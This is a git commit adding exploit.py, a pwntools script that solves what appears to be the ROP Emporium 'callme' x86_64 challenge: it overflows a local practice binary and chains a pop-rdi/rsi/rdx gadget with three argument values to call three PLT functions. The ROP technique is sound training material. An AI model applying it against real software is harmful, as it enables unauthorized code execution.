new file: exploit.py

author: Brett Weiland <techcrazybsw@gmail.com> 2020-12-14 23:08:51 -0600
committer: Brett Weiland <techcrazybsw@gmail.com> 2020-12-14 23:08:51 -0600
commit: 2ddedfeb9199c2ff01b540edf92a4f7d69455c16 (patch)
tree: 7be8597a781d624323af132b37ddebf82ef86442 /x86_64
parent: ae586f332c3fa2919fca99b0ff8acf1e339b0061 (diff)
1 files changed, 50 insertions, 0 deletions
diff --git a/x86_64/callme/exploit.py b/x86_64/callme/exploit.py
new file mode 100755
index 0000000..2f7d8db
--- /dev/null
+++ b/x86_64/callme/exploit.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python3
+from pwn import *
+
+usefulGadgets = p64(0x000000000040093c)
+#   pop rdi
+#   pop rsi
+#   pop rdx
+#   ret
+
+arg1 = p64(0xdeadbeefdeadbeef)
+arg2 = p64(0xcafebabecafebabe)
+arg3 = p64(0xd00df00dd00df00d)
+
+callme_1_plt = p64(0x0000000000400720)
+callme_2_plt = p64(0x0000000000400740)
+callme_3_plt = p64(0x00000000004006f0)
+
+
+
+
+prog = process('./callme')
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_1_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_2_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_3_plt
+
+
+
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
author	Brett Weiland <techcrazybsw@gmail.com>	2020-12-14 23:08:51 -0600
committer	Brett Weiland <techcrazybsw@gmail.com>	2020-12-14 23:08:51 -0600
commit	2ddedfeb9199c2ff01b540edf92a4f7d69455c16 (patch)
tree	7be8597a781d624323af132b37ddebf82ef86442 /x86_64
parent	ae586f332c3fa2919fca99b0ff8acf1e339b0061 (diff)